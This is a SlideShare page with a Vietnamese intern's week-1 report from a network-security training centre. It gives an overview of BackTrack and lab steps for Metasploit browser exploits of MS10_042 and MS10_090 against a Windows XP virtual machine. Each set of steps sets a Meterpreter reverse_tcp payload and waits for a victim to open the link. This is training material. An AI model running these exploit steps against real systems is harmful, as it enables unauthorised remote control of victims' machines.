SlideShare a Scribd company logo
TRUNG TÂM ĐÀO TẠO QUẢNG TRỊ MẠNG VÀ AN
NINH MẠNG QUỐC TẾ ATHENA
Báo Cáo Tuần 1
Chủ đề: Nghiên Cứu về các chức năng của backtrack để
kiểm tra an ninh mạng.
Giáo viên hướng dẫn: Thầy Võ Đỗ Thắng
Thực tập viên: Đỗ Liên Hán
Các Vấn Đề Của Tuần Thứ 1:
1. Nhận tài liệu và gặp giáo viên hướng dẫn
2. Cài đặt backtrack 5r3
3. Thực hành làm quen với backtrack qua 2 lỗi MS10_090
và MS10_042
I. Backtrack là gì?
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để
thử nghiệm thâm nhập. Trong các định dạng Live DVD, có thể sử dụng
Backtrack trực tiếp từ DVD hoặc cài đặt trên máy và sử dụng như một hệ điều
hành. Backtrack hỗ trợ một cách nhanh chóng cho việc tìm kiếm và cập nhật
cơ sở dữ liệu các công cụ bảo mật. Backtrack có lịch sử phát triển qua nhiều
bản Linux khác nhau (phiên bản hiện nay sử dụng bản phân phối Slackware
Linux) và liên tục cập nhập các công cụ, drivers qua các phiên bản… Công cụ
kiểm thử bảo mật trong Backtrack có thể được phân loại thành các nhóm như
sau:
Information gathering: Sử dụng để có được thông tin liên quan đến một mục
tiêu DNS, địa chỉ email, trang web, máy chủ mail….
Network mapping: Quét thăm dò, bao gồm việc kiểm tra các host đang tồn tại,
thông tin về hệ điều hành, ứng dụng được sử dụng bởi mục tiêu….
Vulnerability identification: Quét các lỗ hổng, phân tích Server Message
Block (SMB) và Simple Network Management Protocol (SNMP).
Web application analysis: Theo dõi, giám sát các ứng dụng web.
Radio network analysis: Kiểm tra mạng không dây, bluetooth và nhận dạng
tần số vô tuyến (RFID).
Penetration: Khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu.
Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các
máy tính mục tiêu, các công cụ trong loại này có thể sử dụng để leo thang đặc
quyền.
Maintaining access: Duy trì quyền truy cập vào các máy tính mục tiêu. Những
đặc quyền cao nhất là điều kiện cần thiết trước khi có thể cài đặt công cụ để
duy trì quyền truy cập.
Voice Over IP (VOIP): Các công cụ để phân tích VOIP.
Digital forensics: Phân tích hình ảnh đĩa cứng, cấu trúc các tập tincó thể chọn
Start Backtrack Forensics trong trình đơn khởi động.
Reverse engineering: Gỡ rối chương trình hoặc tháo rời tập tin thực thi.
II. Các bước thực hiện lỗi MS10_042 và MS10_090:
a. Lỗi MS10_042:
1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP.
2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh
msfconsole.
3. Sau đó dung lệnh search ms10_042 đễ tìm kiếm module.
4. Kế tiếp dùng lệnh use
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec.
5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần
thiết cho mã lỗi.
6. Thiết lập các thông tin cần thiết như:
(1)Set srvhost [IP của máy backtrack]
(2)Set lhost [IP của máy backtrack]
(3)Set payload windows/meterpreter/reverse_tcp
7. Dùng lệnh exploit để triển khai.
8. Sau cùng là chờ máy nạn nhân truy cập vào địa chỉ đã exploit.
b. Lỗi MS10_090:
1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP.
2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh
msfconsole.
3. Sau đó dung lệnh search ms10_090 đễ tìm kiếm module.
4. Kế tiếp dùng lệnh use
exploit/windows/browser/ms10_090_ie_css_clip.
5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần
thiết cho mã lỗi.
6. Thiết lập các thông tin cần thiết như:
(1)Set srvhost [IP của máy backtrack]
(2)Set lhost [IP của máy backtrack]
(3)Set payload windows/meterpreter/reverse_tcp
7. Dùng lệnh exploit để triển khai.
8. Sau cùng là chờ máy nạn nhân truy cập vào đường dẫn đã exploit.
Demo cho 2 lỗi trên tại link:
MS10_042 ở tại trang: http://youtu.be/Vk5697U2dMg
MS10_090 ở tại trang: http://youtu.be/t3rewc4tcCw

More Related Content

What's hot

Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Loc Tran
 
Metasploit_Khiem_Quang
Metasploit_Khiem_QuangMetasploit_Khiem_Quang
Metasploit_Khiem_Quangrenlue
 
Botnet slide
Botnet slideBotnet slide
Botnet slide
luu duc anh
 
Beezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke Deserialize
Beezo
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System Hacking
Huynh Khang
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athena
Con Ranh
 
1
11
Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingv7q3t
 
Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2
Âu Dương Bình
 
Kali linux
Kali linuxKali linux
Kali linux
Tân Trần
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hacking
Huynh Khang
 
Report week 4 & 5 & 6
Report week 4 & 5 & 6Report week 4 & 5 & 6
Report week 4 & 5 & 6
Liên Hán
 
Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetthach28
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Âu Dương Bình
 
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)Huy Tiến
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linuxHường Tô
 
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Trọng An
 

What's hot (20)

Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
 
Metasploit_Khiem_Quang
Metasploit_Khiem_QuangMetasploit_Khiem_Quang
Metasploit_Khiem_Quang
 
Botnet slide
Botnet slideBotnet slide
Botnet slide
 
Beezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke Deserialize
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System Hacking
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athena
 
Bao caocuoiki
Bao caocuoikiBao caocuoiki
Bao caocuoiki
 
Bc athena cuoi ky
Bc athena cuoi kyBc athena cuoi ky
Bc athena cuoi ky
 
1
11
1
 
Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hacking
 
Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2
 
Kali linux
Kali linuxKali linux
Kali linux
 
Botnet slide
Botnet slideBotnet slide
Botnet slide
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hacking
 
Report week 4 & 5 & 6
Report week 4 & 5 & 6Report week 4 & 5 & 6
Report week 4 & 5 & 6
 
Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internet
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
 
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linux
 
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
 

Viewers also liked

Final prelim
Final prelimFinal prelim
Final prelim
tylerjohnsonasmedia
 
How to enable pop up blocker
How to enable pop up blockerHow to enable pop up blocker
How to enable pop up blocker
Professoraaron
 
θλιψη
θλιψηθλιψη
θλιψη
gymlefkimmis
 
India vs Bangladesh-wc live
India vs Bangladesh-wc liveIndia vs Bangladesh-wc live
India vs Bangladesh-wc live
crazylions607
 
Penerapan kurikulum 2013 DI SDN 272 Balleangin Bulukumba
Penerapan kurikulum 2013 DI SDN 272 Balleangin BulukumbaPenerapan kurikulum 2013 DI SDN 272 Balleangin Bulukumba
Penerapan kurikulum 2013 DI SDN 272 Balleangin Bulukumba
Ilmal Satriani
 
GOOD FOR WHAT? A sceptical look at the rationalising of morality.
GOOD FOR WHAT? A sceptical look at the rationalising of morality.GOOD FOR WHAT? A sceptical look at the rationalising of morality.
GOOD FOR WHAT? A sceptical look at the rationalising of morality.
noiseTM
 
Get that look - You & Eye - Jan-Feb 2014
 Get that look - You & Eye - Jan-Feb 2014 Get that look - You & Eye - Jan-Feb 2014
Get that look - You & Eye - Jan-Feb 2014
Hina Navin Freelance Journalist/Designer - Dubai
 
Streeter place chicago corporate housing & apartment rentals
Streeter place chicago corporate housing & apartment rentalsStreeter place chicago corporate housing & apartment rentals
Streeter place chicago corporate housing & apartment rentals
suitehome01
 
Academy condos vip
Academy condos vipAcademy condos vip
Academy condos vip
Gold Tiger
 
Bella chyntia sinaga groupthink theory
Bella chyntia sinaga groupthink theoryBella chyntia sinaga groupthink theory
Bella chyntia sinaga groupthink theory
BellaCNS
 

Viewers also liked (10)

Final prelim
Final prelimFinal prelim
Final prelim
 
How to enable pop up blocker
How to enable pop up blockerHow to enable pop up blocker
How to enable pop up blocker
 
θλιψη
θλιψηθλιψη
θλιψη
 
India vs Bangladesh-wc live
India vs Bangladesh-wc liveIndia vs Bangladesh-wc live
India vs Bangladesh-wc live
 
Penerapan kurikulum 2013 DI SDN 272 Balleangin Bulukumba
Penerapan kurikulum 2013 DI SDN 272 Balleangin BulukumbaPenerapan kurikulum 2013 DI SDN 272 Balleangin Bulukumba
Penerapan kurikulum 2013 DI SDN 272 Balleangin Bulukumba
 
GOOD FOR WHAT? A sceptical look at the rationalising of morality.
GOOD FOR WHAT? A sceptical look at the rationalising of morality.GOOD FOR WHAT? A sceptical look at the rationalising of morality.
GOOD FOR WHAT? A sceptical look at the rationalising of morality.
 
Get that look - You & Eye - Jan-Feb 2014
 Get that look - You & Eye - Jan-Feb 2014 Get that look - You & Eye - Jan-Feb 2014
Get that look - You & Eye - Jan-Feb 2014
 
Streeter place chicago corporate housing & apartment rentals
Streeter place chicago corporate housing & apartment rentalsStreeter place chicago corporate housing & apartment rentals
Streeter place chicago corporate housing & apartment rentals
 
Academy condos vip
Academy condos vipAcademy condos vip
Academy condos vip
 
Bella chyntia sinaga groupthink theory
Bella chyntia sinaga groupthink theoryBella chyntia sinaga groupthink theory
Bella chyntia sinaga groupthink theory
 

Similar to Report athena week 1

Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap   nguyen hoai huyBao cao thuc tap   nguyen hoai huy
Bao cao thuc tap nguyen hoai huy
hoaihuysc
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2Con Ranh
 
SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1
Con Ranh
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctapLong Prồ
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1
Anhh Hữu
 
Bai bao cao 3
Bai bao cao 3Bai bao cao 3
Bai bao cao 3
tuankiet123
 
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnTÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
Thái Tuấn Lưu
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploit
Lê Lãnh
 
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýBáo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýQuý Đồng Nast
 
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýTổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýQuý Đồng Nast
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdf
PhamTruongGiang4
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
Chuc Thanh
 
Tuan 3
Tuan 3Tuan 3
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdffile_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
BcNguynQuang1
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
kakawpah0911
 
BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1
kakawpah0911
 
Baocaocuoiki
BaocaocuoikiBaocaocuoiki
Baocaocuoiki
Vương Nguyễn
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
phanconghien
 

Similar to Report athena week 1 (20)

Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap   nguyen hoai huyBao cao thuc tap   nguyen hoai huy
Bao cao thuc tap nguyen hoai huy
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2
 
SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctap
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1
 
Bai bao cao 3
Bai bao cao 3Bai bao cao 3
Bai bao cao 3
 
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnTÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploit
 
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýBáo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
 
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýTổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdf
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Tuan 3
Tuan 3Tuan 3
Tuan 3
 
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdffile_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
 
BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1
 
Baocaocuoiki
BaocaocuoikiBaocaocuoiki
Baocaocuoiki
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
 

Report athena week 1

  • 1. TRUNG TÂM ĐÀO TẠO QUẢNG TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA Báo Cáo Tuần 1 Chủ đề: Nghiên Cứu về các chức năng của backtrack để kiểm tra an ninh mạng. Giáo viên hướng dẫn: Thầy Võ Đỗ Thắng Thực tập viên: Đỗ Liên Hán Các Vấn Đề Của Tuần Thứ 1: 1. Nhận tài liệu và gặp giáo viên hướng dẫn 2. Cài đặt backtrack 5r3 3. Thực hành làm quen với backtrack qua 2 lỗi MS10_090 và MS10_042
  • 2. I. Backtrack là gì? Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm thâm nhập. Trong các định dạng Live DVD, có thể sử dụng Backtrack trực tiếp từ DVD hoặc cài đặt trên máy và sử dụng như một hệ điều hành. Backtrack hỗ trợ một cách nhanh chóng cho việc tìm kiếm và cập nhật cơ sở dữ liệu các công cụ bảo mật. Backtrack có lịch sử phát triển qua nhiều bản Linux khác nhau (phiên bản hiện nay sử dụng bản phân phối Slackware Linux) và liên tục cập nhập các công cụ, drivers qua các phiên bản… Công cụ kiểm thử bảo mật trong Backtrack có thể được phân loại thành các nhóm như sau: Information gathering: Sử dụng để có được thông tin liên quan đến một mục tiêu DNS, địa chỉ email, trang web, máy chủ mail…. Network mapping: Quét thăm dò, bao gồm việc kiểm tra các host đang tồn tại, thông tin về hệ điều hành, ứng dụng được sử dụng bởi mục tiêu…. Vulnerability identification: Quét các lỗ hổng, phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP). Web application analysis: Theo dõi, giám sát các ứng dụng web. Radio network analysis: Kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID). Penetration: Khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu. Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, các công cụ trong loại này có thể sử dụng để leo thang đặc quyền.
  • 3. Maintaining access: Duy trì quyền truy cập vào các máy tính mục tiêu. Những đặc quyền cao nhất là điều kiện cần thiết trước khi có thể cài đặt công cụ để duy trì quyền truy cập. Voice Over IP (VOIP): Các công cụ để phân tích VOIP. Digital forensics: Phân tích hình ảnh đĩa cứng, cấu trúc các tập tincó thể chọn Start Backtrack Forensics trong trình đơn khởi động. Reverse engineering: Gỡ rối chương trình hoặc tháo rời tập tin thực thi.
  • 4. II. Các bước thực hiện lỗi MS10_042 và MS10_090: a. Lỗi MS10_042: 1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP. 2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh msfconsole. 3. Sau đó dung lệnh search ms10_042 đễ tìm kiếm module. 4. Kế tiếp dùng lệnh use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec. 5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần thiết cho mã lỗi. 6. Thiết lập các thông tin cần thiết như: (1)Set srvhost [IP của máy backtrack] (2)Set lhost [IP của máy backtrack] (3)Set payload windows/meterpreter/reverse_tcp 7. Dùng lệnh exploit để triển khai. 8. Sau cùng là chờ máy nạn nhân truy cập vào địa chỉ đã exploit. b. Lỗi MS10_090: 1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP. 2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh msfconsole. 3. Sau đó dung lệnh search ms10_090 đễ tìm kiếm module. 4. Kế tiếp dùng lệnh use exploit/windows/browser/ms10_090_ie_css_clip. 5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần thiết cho mã lỗi. 6. Thiết lập các thông tin cần thiết như: (1)Set srvhost [IP của máy backtrack] (2)Set lhost [IP của máy backtrack] (3)Set payload windows/meterpreter/reverse_tcp 7. Dùng lệnh exploit để triển khai. 8. Sau cùng là chờ máy nạn nhân truy cập vào đường dẫn đã exploit.
  • 5. Demo cho 2 lỗi trên tại link: MS10_042 ở tại trang: http://youtu.be/Vk5697U2dMg MS10_090 ở tại trang: http://youtu.be/t3rewc4tcCw